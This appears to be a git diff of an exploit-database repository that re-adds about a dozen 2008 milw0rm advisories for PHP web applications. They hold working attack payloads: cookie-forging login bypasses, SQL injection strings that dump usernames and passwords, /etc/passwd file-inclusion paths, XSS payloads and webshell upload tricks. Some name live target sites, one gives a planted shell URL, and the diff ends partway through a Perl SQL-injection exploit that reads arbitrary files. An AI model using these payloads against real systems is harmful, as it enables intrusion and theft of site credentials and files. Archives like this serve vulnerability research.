-   [/CODE]
-
-   [!] FIX: Just filter direct user input.
-
-
-2) /path/update.php
-   This file gets quotes.txt content, and print it directly into html code. 
-   In 1) we saw that we can put arbitrary data into this .txt file. Just
-   Put js code ;)
-
-   [CODE]
-
-    $quotes = file_get_contents("quotes.txt");
-    $quotes= preg_split("/[\t]+/", $quotes);
-    $i = 0;
-    $noQuotes = sizeOf($quotes);
-    while ($i < $noQuotes)
-    {
-        $quote = $quotes[$i];
-        echo '<option value='.$i.'>'.$quote.'</option>';
-        $i = $i + 1;
-    }
-
-    [/CODE]
-
-    [!] FIX: A fix could be just to filter input before being printed in html code.
-
-
-## How to exploit this bugs?
-
-[!] EXPLOIT: /[path]/submit.php?quote=<script>alert("XSS")</script>
-
-#########################################################################################
-[/END]
-
-# milw0rm.com [2008-12-17]
+[START]
+
+#########################################################################################
+[0x01] Informations:
+
+Script         : RSMScript 1.21
+Download       : http://www.hotscripts.com/jump.php?listing_id=78547&jump_type=1
+Vulnerability  : Insecure Cookie Handling / XXS
+Author         : Osirys
+Contact        : osirys[at]live[dot]it
+Website        : http://osirys.org
+Notes          : Proud to be Italian
+Greets:        : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX
+
+#########################################################################################
+[0x02] Bug: [Insecure Cookie Handling]
+######
+
+Bugged file is: /[path]/verify.php
+
+[CODE]
+
+if($admin_pass == $code)
+{
+  setcookie("verified", "null", time()+1800);
+  header( 'refresh: 0; url=update.php' );
+}
+
+[/CODE]
+
+As we can see, if the password "$code" typed is the same of $admin_pass, so you log in,
+cookie is set with the name "verified" and with content "null". So, a malicious user
+can just set up a cookie with that name and value, and then he will be logged as the 
+admin.
+
+[!] FIX: A fix could be to put as a content or cookie name the password. Example:
+
+[CODE] setcookie("verified", "$admin_pass", time()+1800); [/CODE]
+
+
+[!] EXPLOIT: javascript:document.cookie = "verified=null; path=/";
+
+#########################################################################################
+[0x03] Bug: [XSS]
+######
+
+To exploit this bug, we must be logged in. Just bypass the login with the Cookie ;)
+There are two bugged file.
+
+1) /[path/submit.php
+   In this file, we can put arbitrary data into a .txt file.
+
+   [CODE]
+
+    $quote = $_REQUEST['quote'];
+    $writePage = fopen('quotes.txt', 'a') or die("can't open file");
+	fwrite($writePage, "\t");
+    fwrite($writePage, stripslashes($quote));
+    fclose($writePage);
+
+   [/CODE]
+
+   [!] FIX: Just filter direct user input.
+
+
+2) /path/update.php
+   This file gets quotes.txt content, and print it directly into html code. 
+   In 1) we saw that we can put arbitrary data into this .txt file. Just
+   Put js code ;)
+
+   [CODE]
+
+    $quotes = file_get_contents("quotes.txt");
+    $quotes= preg_split("/[\t]+/", $quotes);
+    $i = 0;
+    $noQuotes = sizeOf($quotes);
+    while ($i < $noQuotes)
+    {
+        $quote = $quotes[$i];
+        echo '<option value='.$i.'>'.$quote.'</option>';
+        $i = $i + 1;
+    }
+
+    [/CODE]
+
+    [!] FIX: A fix could be just to filter input before being printed in html code.
+
+
+## How to exploit this bugs?
+
+[!] EXPLOIT: /[path]/submit.php?quote=<script>alert("XSS")</script>
+
+#########################################################################################
+[/END]
+
+# milw0rm.com [2008-12-17]
diff --git a/platforms/php/webapps/7500.txt b/platforms/php/webapps/7500.txt
index 3ff923ebb..7ecb79269 100755
--- a/platforms/php/webapps/7500.txt
+++ b/platforms/php/webapps/7500.txt
@@ -1,31 +1,31 @@
-## Script Name: Shopsysteme (new version oscommerce)
-
-## Download: http://www.shopsystem-forum.de/product_info.php?cPath=22&products_id=43 (299 euro)  :) 
-
-## Author: mNt
-
-## File Upload Bug
-
-## Google Dork: intext:Powered by K&S Media Concept - Shopsysteme [Powered by K&S Media Concept - Shopsysteme için yaklaşık 32.900 sonuçtan 191 - 200 arası sonuçlar (0,51 saniye)]
-
-## Use:
-
-http://www.example.com/
-
-after add: /admin/editor/images.php ==> http://www.example.com/admin/editor/images.php
-
-File uploaded php shell
-
-after in url: http://www.example.com/images/upload/mNt.php
-
-Attention: Shell Code Ä°n GIF89;a
-
-## Live demo: http://www.trampleandfetish.de/admin/editor/image.php
-
-## Php Shell Adres: http://www.trampleandfetish.de/images/upload/data.php
-
-## Thanks: DelİDolU, HeDgEs, Scarface, Cih@t, Suskun Dünyam, Lodos2005, Sabotage
-
-## web Site: www.rootingforced.org || www.rootingforced.com || www.rootingforced.net
-
-# milw0rm.com [2008-12-17]
+## Script Name: Shopsysteme (new version oscommerce)
+
+## Download: http://www.shopsystem-forum.de/product_info.php?cPath=22&products_id=43 (299 euro)  :) 
+
+## Author: mNt
+
+## File Upload Bug
+
+## Google Dork: intext:Powered by K&S Media Concept - Shopsysteme [Powered by K&S Media Concept - Shopsysteme için yaklaşık 32.900 sonuçtan 191 - 200 arası sonuçlar (0,51 saniye)]
+
+## Use:
+
+http://www.example.com/
+
+after add: /admin/editor/images.php ==> http://www.example.com/admin/editor/images.php
+
+File uploaded php shell
+
+after in url: http://www.example.com/images/upload/mNt.php
+
+Attention: Shell Code Ä°n GIF89;a
+
+## Live demo: http://www.trampleandfetish.de/admin/editor/image.php
+
+## Php Shell Adres: http://www.trampleandfetish.de/images/upload/data.php
+
+## Thanks: DelİDolU, HeDgEs, Scarface, Cih@t, Suskun Dünyam, Lodos2005, Sabotage
+
+## web Site: www.rootingforced.org || www.rootingforced.com || www.rootingforced.net
+
+# milw0rm.com [2008-12-17]
diff --git a/platforms/php/webapps/7504.txt b/platforms/php/webapps/7504.txt
index 6773c087f..c58d6c0aa 100755
--- a/platforms/php/webapps/7504.txt
+++ b/platforms/php/webapps/7504.txt
@@ -1,53 +1,53 @@
- 
-                          ||          ||   | ||         
-                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,  
-                  ( :   /    (_)    /           (   .   
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-|     _                   __           __       __          ______     |
-|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
-|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
-|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
-|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
-|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
-|                  \ \____/ >> Kings of injection                      |
-|                   \/___/                                             |
-|                                                                      |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
- 
- 
-<<!>> Found by  :  Cyb3r-1sT
- 
-<<!>> C0ntact : cyb3r-1st [at] hotmail.com  
-                    
-<<!>> Groups : InjEctOr5 T3am  
- 
-=======================================================
-+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
-=======================================================
- 
- 
-<<->> D0rk    : find it
- 
-<<->> Exploit :>>>                
-                                    
-                     :>>>  http://www.site.me/index.php?option=com_tech_article&Itemid=17&item=-1+union+select+0,concat(username,0x3a,password),0,0,0,0,0,0,0+from+jos_users--&task=item
- 
- 
-=======================================================
-++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
-=======================================================
- 
-<<->> All freinds , all muslims , str0ke 
-
-side note:
-<name>tech_article</name>
-<creationDate>3-23-2006</creationDate>
-<author>Anthony Ferrara</author>
-<copyright>GPL</copyright>
-<authorEmail>ircmaxell@yahoo.com</authorEmail>
-<authorUrl>www.ircmaxell.com</authorUrl>
-<version>1.0.1</version>
-<description>Tech Article Component For Joomla</description>
-
-# milw0rm.com [2008-12-17]
+ 
+                          ||          ||   | ||         
+                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,  
+                  ( :   /    (_)    /           (   .   
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|                                                                      |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+ 
+ 
+<<!>> Found by  :  Cyb3r-1sT
+ 
+<<!>> C0ntact : cyb3r-1st [at] hotmail.com  
+                    
+<<!>> Groups : InjEctOr5 T3am  
+ 
+=======================================================
++++++++++++++++++++++++ Exploit +++++++++++++++++++++++
+=======================================================
+ 
+ 
+<<->> D0rk    : find it
+ 
+<<->> Exploit :>>>                
+                                    
+                     :>>>  http://www.site.me/index.php?option=com_tech_article&Itemid=17&item=-1+union+select+0,concat(username,0x3a,password),0,0,0,0,0,0,0+from+jos_users--&task=item
+ 
+ 
+=======================================================
+++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
+=======================================================
+ 
+<<->> All freinds , all muslims , str0ke 
+
+side note:
+<name>tech_article</name>
+<creationDate>3-23-2006</creationDate>
+<author>Anthony Ferrara</author>
+<copyright>GPL</copyright>
+<authorEmail>ircmaxell@yahoo.com</authorEmail>
+<authorUrl>www.ircmaxell.com</authorUrl>
+<version>1.0.1</version>
+<description>Tech Article Component For Joomla</description>
+
+# milw0rm.com [2008-12-17]
diff --git a/platforms/php/webapps/7509.txt b/platforms/php/webapps/7509.txt
index d2ceb41c1..f1ba149ce 100755
--- a/platforms/php/webapps/7509.txt
+++ b/platforms/php/webapps/7509.txt
@@ -1,23 +1,23 @@
-#########################################################
----------------------------------------------------------
-Portal Name: Mini File Host
-Version: All version
-Vendor : http://www.galaxyscripts.com
-Dork: inurl:index.php?page=img Powered By Mini File Host
-Author : Pouya_Server , Pouya.s3rver@Gmail.com
-Vulnerability : (Uploader Bypass)
----------------------------------------------------------
-#########################################################
-[Mime Check Bypass]:
-create a file called name.php and fill it as below:
-----------
-GIF89aP;
-[shell]
-----------
-Save and upload !
-
-[Video]:
-http://pouya2006.persiangig.com/UploadVideo/minifile.rar
----------------------------------
-
-# milw0rm.com [2008-12-18]
+#########################################################
+---------------------------------------------------------
+Portal Name: Mini File Host
+Version: All version
+Vendor : http://www.galaxyscripts.com
+Dork: inurl:index.php?page=img Powered By Mini File Host
+Author : Pouya_Server , Pouya.s3rver@Gmail.com
+Vulnerability : (Uploader Bypass)
+---------------------------------------------------------
+#########################################################
+[Mime Check Bypass]:
+create a file called name.php and fill it as below:
+----------
+GIF89aP;
+[shell]
+----------
+Save and upload !
+
+[Video]:
+http://pouya2006.persiangig.com/UploadVideo/minifile.rar
+---------------------------------
+
+# milw0rm.com [2008-12-18]
diff --git a/platforms/php/webapps/7513.txt b/platforms/php/webapps/7513.txt
index 903508dfb..118a9bba9 100755
--- a/platforms/php/webapps/7513.txt
+++ b/platforms/php/webapps/7513.txt
@@ -1,53 +1,53 @@
-[START]
-
-#########################################################################################
-[0x01] Informations:
-
-Script         : Calendar Script v1.1
-Download       : http://www.hotscripts.com/jump.php?listing_id=71365&jump_type=1
-Vulnerability  : Insecure Cookie Handling
-Author         : Osirys
-Contact        : osirys[at]live[dot]it
-Website        : http://osirys.org
-Notes          : Proud to be Italian
-Greets:        : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX
-
-
-#########################################################################################
-[0x02] Bug: [Insecure Cookie Handling]
-######
-
-Bugged file is: /[path]/index.php
-
-[CODE]
-
-if(mysql_num_rows($checkDetails) > 0) {
-    setcookie('nodstrumCalendarV2', '1', time()+3600);	// Cookie will expire in 1 hour.
-    // $loginMsg = '<span style="color: green">You are logged in<i>!</i></span>';
-}
-
-[/CODE]
-
-If we login in correctly, a cookie is created with 'nodstrumCalendarV2' as name and
-'1' as content.
-
-## [!] FIX: Change name or content to the cookie. Example:
-
-[CODE]
-
-if(mysql_num_rows($checkDetails) > 0) {
-    setcookie('nodstrumCalendarV2', '$password', time()+3600);	// Cookie will expire in 1 hour.
-    // $loginMsg = '<span style="color: green">You are logged in<i>!</i></span>';
-}
-
-[/CODE]
-
-
-### [!] EXPLOIT: javascript:document.cookie = "nodstrumCalendarV2=1; path=/";
-
-
-#########################################################################################
-
-[/END]
-
-# milw0rm.com [2008-12-18]
+[START]
+
+#########################################################################################
+[0x01] Informations:
+
+Script         : Calendar Script v1.1
+Download       : http://www.hotscripts.com/jump.php?listing_id=71365&jump_type=1
+Vulnerability  : Insecure Cookie Handling
+Author         : Osirys
+Contact        : osirys[at]live[dot]it
+Website        : http://osirys.org
+Notes          : Proud to be Italian
+Greets:        : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX
+
+
+#########################################################################################
+[0x02] Bug: [Insecure Cookie Handling]
+######
+
+Bugged file is: /[path]/index.php
+
+[CODE]
+
+if(mysql_num_rows($checkDetails) > 0) {
+    setcookie('nodstrumCalendarV2', '1', time()+3600);	// Cookie will expire in 1 hour.
+    // $loginMsg = '<span style="color: green">You are logged in<i>!</i></span>';
+}
+
+[/CODE]
+
+If we login in correctly, a cookie is created with 'nodstrumCalendarV2' as name and
+'1' as content.
+
+## [!] FIX: Change name or content to the cookie. Example:
+
+[CODE]
+
+if(mysql_num_rows($checkDetails) > 0) {
+    setcookie('nodstrumCalendarV2', '$password', time()+3600);	// Cookie will expire in 1 hour.
+    // $loginMsg = '<span style="color: green">You are logged in<i>!</i></span>';
+}
+
+[/CODE]
+
+
+### [!] EXPLOIT: javascript:document.cookie = "nodstrumCalendarV2=1; path=/";
+
+
+#########################################################################################
+
+[/END]
+
+# milw0rm.com [2008-12-18]
diff --git a/platforms/php/webapps/7514.txt b/platforms/php/webapps/7514.txt
index 6732b0a01..666bbef3e 100755
--- a/platforms/php/webapps/7514.txt
+++ b/platforms/php/webapps/7514.txt
@@ -1,40 +1,40 @@
-#######################################################
-I-Rater Basic(messages.php) SQL-injection.
-#######################################################
-
-###################################################
-#[~] Author :  boom3rang 
-#[~] Kosova Hackers Group [www.khg-crew.ws]
-#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
-
-
-#[!] Script Name: I-Rater Basic
-#[!] Home Page:  http://www.i-rater.com
-#[!] Google_Dork:  N/A
-###################################################
-
-
-
-
-
-#[~] Example:  
-http://localhost/Path/messages.php?idp=[exploit]
-
-#[~]Exploit:  
--9999+union+all+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8+from+admin--
-
-
-#[!] Live Demo
-http://www.i-rater.com/basic/messages.php?idp=-9999+union+all+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8+from+admin--
-
-
-#[!] Note
-To see the information go View Sources/Search "large.php?id=" ;).
-
-##############################
-#[!] Proud 2 be Albanian
-#[!] Proud 2 be Muslim
-#[!] United States of Albania
-##############################
-
-# milw0rm.com [2008-12-18]
+#######################################################
+I-Rater Basic(messages.php) SQL-injection.
+#######################################################
+
+###################################################
+#[~] Author :  boom3rang 
+#[~] Kosova Hackers Group [www.khg-crew.ws]
+#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
+
+
+#[!] Script Name: I-Rater Basic
+#[!] Home Page:  http://www.i-rater.com
+#[!] Google_Dork:  N/A
+###################################################
+
+
+
+
+
+#[~] Example:  
+http://localhost/Path/messages.php?idp=[exploit]
+
+#[~]Exploit:  
+-9999+union+all+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8+from+admin--
+
+
+#[!] Live Demo
+http://www.i-rater.com/basic/messages.php?idp=-9999+union+all+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8+from+admin--
+
+
+#[!] Note
+To see the information go View Sources/Search "large.php?id=" ;).
+
+##############################
+#[!] Proud 2 be Albanian
+#[!] Proud 2 be Muslim
+#[!] United States of Albania
+##############################
+
+# milw0rm.com [2008-12-18]
diff --git a/platforms/php/webapps/7515.txt b/platforms/php/webapps/7515.txt
index ba8654a3d..aaf6627f8 100755
--- a/platforms/php/webapps/7515.txt
+++ b/platforms/php/webapps/7515.txt
@@ -1,52 +1,52 @@
-Phpclanwebsite <= 1.23.3 Fix Pack #5 (File Including/SQL/XSS) Multiple Remote Vulnerabilities
-
-The description:
-The set vulnerability in CMS Phpclanwebsite versions 1.23.3 Fix Pack #5 and more low was revealed.
-
-1. Multiple File Including Vulnerabilities
-
-Vulnerability exists for the reason that direct access to some files, around logicians of work of the appendix is possible.
-It gives the chance to redefine internal variables which are transferred as arguments in function include ().
-Examples of vulnerable files:
-/theme/superchrome/box.php?boxname=../../../../../etc/passwd%00
-/phpclanwebsite/footer.php?theme=../../../../../etc/passwd%00
-etc
-
-The note:
-For vulnerability operation the following options PHP are required: register_globals=On and magic_quotes_gpc=Off
-
-2. Multiple SQL Injection Vulnerabilities
-
-The appendix everywhere does not check the variables transferred from outside of the user. It allows to carry out any SQL Injection.
-Examples of vulnerable files:
-SQL Injection (insert) -
- /index.php?page='SQL
-SQL Injection (delete) -
- /index.php?page=processforms&ok=1&SP=1&form_id=2
- , where "form_id" the identifier of the deleted user
-SQL Injection (select) -
- /index.php?page=login
- POST:pcwlogin='SQL&pcw_pass='SQL
-
- /index.php?page=login
- POST:pcwlogin=1'+OR+1=1--&pcw_pass=1
-
-SQL Injection (select) -
- /index.php?page=downloads&func=search
- POST:searchvalue='SQL&whichfield=SQL
-
- /index.php?page=downloads&func=search
- POST:searchvalue=1&whichfield=dl_name>1)+limit+0+union+select+tag,2,3,login,5,6,7,email,9,password,11,12,13,14,15+from+cws_members--
-etc
-
-The note:
-For operation of all SQL Injection vulnerabilities, except vulnerability in parametre "whichfield", are required disconnected magic_quotes_gpc.
-
-3. Multiple Cross-site Scripting Vulnerabilities
-
-The appendix everywhere does not check the variables transferred from outside of the user. It allows to carry out any code in a context of a user browser.
-Examples of vulnerable files:
-/index.php?page='><script>alert('XSS')</script>
-etc
-
-# milw0rm.com [2008-12-18]
+Phpclanwebsite <= 1.23.3 Fix Pack #5 (File Including/SQL/XSS) Multiple Remote Vulnerabilities
+
+The description:
+The set vulnerability in CMS Phpclanwebsite versions 1.23.3 Fix Pack #5 and more low was revealed.
+
+1. Multiple File Including Vulnerabilities
+
+Vulnerability exists for the reason that direct access to some files, around logicians of work of the appendix is possible.
+It gives the chance to redefine internal variables which are transferred as arguments in function include ().
+Examples of vulnerable files:
+/theme/superchrome/box.php?boxname=../../../../../etc/passwd%00
+/phpclanwebsite/footer.php?theme=../../../../../etc/passwd%00
+etc
+
+The note:
+For vulnerability operation the following options PHP are required: register_globals=On and magic_quotes_gpc=Off
+
+2. Multiple SQL Injection Vulnerabilities
+
+The appendix everywhere does not check the variables transferred from outside of the user. It allows to carry out any SQL Injection.
+Examples of vulnerable files:
+SQL Injection (insert) -
+ /index.php?page='SQL
+SQL Injection (delete) -
+ /index.php?page=processforms&ok=1&SP=1&form_id=2
+ , where "form_id" the identifier of the deleted user
+SQL Injection (select) -
+ /index.php?page=login
+ POST:pcwlogin='SQL&pcw_pass='SQL
+
+ /index.php?page=login
+ POST:pcwlogin=1'+OR+1=1--&pcw_pass=1
+
+SQL Injection (select) -
+ /index.php?page=downloads&func=search
+ POST:searchvalue='SQL&whichfield=SQL
+
+ /index.php?page=downloads&func=search
+ POST:searchvalue=1&whichfield=dl_name>1)+limit+0+union+select+tag,2,3,login,5,6,7,email,9,password,11,12,13,14,15+from+cws_members--
+etc
+
+The note:
+For operation of all SQL Injection vulnerabilities, except vulnerability in parametre "whichfield", are required disconnected magic_quotes_gpc.
+
+3. Multiple Cross-site Scripting Vulnerabilities
+
+The appendix everywhere does not check the variables transferred from outside of the user. It allows to carry out any code in a context of a user browser.
+Examples of vulnerable files:
+/index.php?page='><script>alert('XSS')</script>
+etc
+
+# milw0rm.com [2008-12-18]
diff --git a/platforms/php/webapps/7517.txt b/platforms/php/webapps/7517.txt
index bb5255e67..a74d071f1 100755
--- a/platforms/php/webapps/7517.txt
+++ b/platforms/php/webapps/7517.txt
@@ -1,30 +1,30 @@
-Injader CMS
-http://www.injader.com/
-
-
-
-- (= 2.1.1 -
-
-- SQL -
-http://localhost/upload/feeds.php?name=articles&id=<SQL>
-magic_quotes_gpc = Off
-register_globals = On
-
-
-Username (urlencode):
-2 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL FROM maj_users# AND 2511=2511
-Pass:
-2 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(0),IFNULL(CAST(userpass AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL FROM maj_users# AND 8758=8758
-
-
-
-- Timeline -
-Author notified: Nov 30, Dec 09,10
-Injader 2.1.2: Dec 12
-Public disclosure: Dec 18
-
-
-- Seasons Greetings -
-- http://nukeit.org -
-
-# milw0rm.com [2008-12-18]
+Injader CMS
+http://www.injader.com/
+
+
+
+- (= 2.1.1 -
+
+- SQL -
+http://localhost/upload/feeds.php?name=articles&id=<SQL>
+magic_quotes_gpc = Off
+register_globals = On
+
+
+Username (urlencode):
+2 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL FROM maj_users# AND 2511=2511
+Pass:
+2 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(0),IFNULL(CAST(userpass AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL FROM maj_users# AND 8758=8758
+
+
+
+- Timeline -
+Author notified: Nov 30, Dec 09,10
+Injader 2.1.2: Dec 12
+Public disclosure: Dec 18
+
+
+- Seasons Greetings -
+- http://nukeit.org -
+
+# milw0rm.com [2008-12-18]
diff --git a/platforms/php/webapps/7518.txt b/platforms/php/webapps/7518.txt
index 433a70217..e108f35d1 100755
--- a/platforms/php/webapps/7518.txt
+++ b/platforms/php/webapps/7518.txt
@@ -1,37 +1,37 @@
----------------------------
-Gobbl Cms 1.0 I.Cookie Hand.
----------------------------
-Autore: x0r ( Evolution Team)
-Email: andry2000@hotmail.it
-Demo Site:http://www.gobbl.net/
----------------------------
- 
-Bug In: \admin\auth.php  
- 
-?>
-include ('../config.php');
- 
-$user = $_POST['user'];
-$pass = $_POST['pass'];
- 
-if ( ($user == $un) and ($pass == $pw) )
-{
-setcookie( "auth", "ok", time()+40000 ); # Bugz
-header ( "location:add.php" ); exit ();
-}
-else
-{
-header ( "location:index.php" ); exit ();
-}
-?>
- 
-Il file auth.php controlla se nel file ../config.php le post $user\$pass presentano gli stessi dati delle variabili
-$un\$pw ( config.php ) se così è setta il cookie auth=ok :P ^ ^
- 
-Exploit:  
- 
-javascript:document.cookie = "auth=ok; path=/"; then \admin\menu.php # So Easy To Hack :P
- 
-Greetz: Amore Mio Sei La Mia Stella Che Mi Illumina Qua Giù...Ti AmO
-
-# milw0rm.com [2008-12-18]
+---------------------------
+Gobbl Cms 1.0 I.Cookie Hand.
+---------------------------
+Autore: x0r ( Evolution Team)
+Email: andry2000@hotmail.it
+Demo Site:http://www.gobbl.net/
+---------------------------
+ 
+Bug In: \admin\auth.php  
+ 
+?>
+include ('../config.php');
+ 
+$user = $_POST['user'];
+$pass = $_POST['pass'];
+ 
+if ( ($user == $un) and ($pass == $pw) )
+{
+setcookie( "auth", "ok", time()+40000 ); # Bugz
+header ( "location:add.php" ); exit ();
+}
+else
+{
+header ( "location:index.php" ); exit ();
+}
+?>
+ 
+Il file auth.php controlla se nel file ../config.php le post $user\$pass presentano gli stessi dati delle variabili
+$un\$pw ( config.php ) se così è setta il cookie auth=ok :P ^ ^
+ 
+Exploit:  
+ 
+javascript:document.cookie = "auth=ok; path=/"; then \admin\menu.php # So Easy To Hack :P
+ 
+Greetz: Amore Mio Sei La Mia Stella Che Mi Illumina Qua Giù...Ti AmO
+
+# milw0rm.com [2008-12-18]
diff --git a/platforms/php/webapps/7519.txt b/platforms/php/webapps/7519.txt
index 3be6df51c..6dd8f4c3e 100755
--- a/platforms/php/webapps/7519.txt
+++ b/platforms/php/webapps/7519.txt
@@ -1,26 +1,26 @@
-################## Piker #######################################
-#
-#
-#    MyPHPSite Local File Inclusion Vulnerability
-#
-#
-#    Affected software: MyPHPSite
-#    Vendor: www.myphpsite.org
-#    Risk: Medium
-#
-################################################################
-#
-#    http://[target]/[path]/index.php?mod=[LFI]%00
-#
-#   PoC: http://[target]/[path]/index.php?mod=../../../../../../etc/passwd%00
-#
-################################################################
-#
-#         Found by Piker [piker0x90(at)gmail(dot)com]
-#            D.O.M Labs - Security Researchers
-#           www.domlabs.org
-#
-#
-################################################################
-
-# milw0rm.com [2008-12-18]
+################## Piker #######################################
+#
+#
+#    MyPHPSite Local File Inclusion Vulnerability
+#
+#
+#    Affected software: MyPHPSite
+#    Vendor: www.myphpsite.org
+#    Risk: Medium
+#
+################################################################
+#
+#    http://[target]/[path]/index.php?mod=[LFI]%00
+#
+#   PoC: http://[target]/[path]/index.php?mod=../../../../../../etc/passwd%00
+#
+################################################################
+#
+#         Found by Piker [piker0x90(at)gmail(dot)com]
+#            D.O.M Labs - Security Researchers
+#           www.domlabs.org
+#
+#
+################################################################
+
+# milw0rm.com [2008-12-18]
diff --git a/platforms/php/webapps/7522.pl b/platforms/php/webapps/7522.pl
index 8ff160e03..8b84622eb 100755
--- a/platforms/php/webapps/7522.pl
+++ b/platforms/php/webapps/7522.pl
@@ -1,109 +1,109 @@
-#!/usr/bin/perl
-################################
-##    Coded by Piker [piker(dot)ther00t(at)gmail(dot)com]
-##      D.O.M Team
-## piker,ka0x,an0de,xarnuz
-## 2008 Security Researchers
-################################
-##
-## MyPBS Remote SQL Injection Exploit
-##
-##   This exploit tries to read an
-##   arbitrary file.
-##
-################################
-
-# piker@domlabs:~/advisories$ perl mypbs.pl http://localhost/mypbs /etc/passwd
-#[+] File HEX: 0x2f6574632f706173737764
-#[+] Host: http://localhost/mypbs/
-#[+] File content:
-#daemon:x:1:1:daemon:/usr/sbin:/bin/sh
-#bin:x:2:2:bin:/bin:/bin/sh
-#sys:x:3:3:sys:/dev:/bin/sh
-#sync:x:4:65534:sync:/bin:/bin/sync
-#games:x:5:60:games:/usr/games:/bin/sh
-# [...]
-#[+] EOF
-#
-#
-
-
-use LWP::UserAgent;
-
-open(FILE, ">&STDOUT");
-
-my $host = $ARGV[0];
-my $file = $ARGV[1];
-
-die &_USO unless $ARGV[1];
-
-sub _USO
-{
-    die "
-    MyPBS Remote SQL Injection Exploit
-
-    This exploit tries to read an
-    arbitrary file.
-  
-    usage: ./$0 <host> <file_you_want>
-    ex: ./$0 http://localhost/mypbs/ /etc/passwd
-
-    ";
-}
-
-my $ua = LWP::UserAgent->new() or die;
-$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1");
-
-my $tmp="0x";
-my $tmp2;
-
-foreach my $c (split(//, $file)){
-    $tmp2 = sprintf ("%x", ord($c));
-    $tmp .= $tmp2;
-}
-
-print FILE "[+] File HEX: ".$tmp."\n";
-
-if ($host !~ /\/$/){ $host .= "/"; }
-
-print FILE "[+] Host: ".$host."\n";
-
-my $req = HTTP::Request->new(GET => $host."index.php?seasonID=-1 union all select CONCAT(0x3c46494c453e,load_file(".$tmp."),0x3c46494c453e)");
-my $res = $ua->request($req);
-my $con = $res->content;
-
-my $ok = 0;
-open (OUT, ">result.txt");
-
-if ($res->is_success){
-    foreach my $linea (split(/\n/, $con)){
-        if($ok == 1){
-            if ($linea !~ /<FILE>/){
-                print FILE $linea."\n";
-        print OUT $linea."\n";
-            }else{
-                print FILE "\n[+] EOF\n";
-        print "\n[+] File saved into 'result.txt'\n";
-                goto salida;
-            }
-        }
-        if($linea =~ /<FILE>/i && $ok == 0){
-            $ok = 1;
-            print FILE "[+] File content: \n";
-        }
-    }
-    salida:
-    if ($ok == 0){
-        print FILE "[-] Exploit Failed!";
-    }      
-}
-else{
-    print FILE "[-] Exploit Failed!";
-}
-
-close(FILE);
-close(OUT);
-
-#EOF
-
-# milw0rm.com [2008-12-19]
+#!/usr/bin/perl
+################################
+##    Coded by Piker [piker(dot)ther00t(at)gmail(dot)com]
+##      D.O.M Team
+## piker,ka0x,an0de,xarnuz
+## 2008 Security Researchers
+################################
+##
+## MyPBS Remote SQL Injection Exploit
+##
+##   This exploit tries to read an
+##   arbitrary file.
+##
+################################
+
+# piker@domlabs:~/advisories$ perl mypbs.pl http://localhost/mypbs /etc/passwd
+#[+] File HEX: 0x2f6574632f706173737764
+#[+] Host: http://localhost/mypbs/
+#[+] File content:
+#daemon:x:1:1:daemon:/usr/sbin:/bin/sh
+#bin:x:2:2:bin:/bin:/bin/sh
+#sys:x:3:3:sys:/dev:/bin/sh
+#sync:x:4:65534:sync:/bin:/bin/sync
+#games:x:5:60:games:/usr/games:/bin/sh
+# [...]
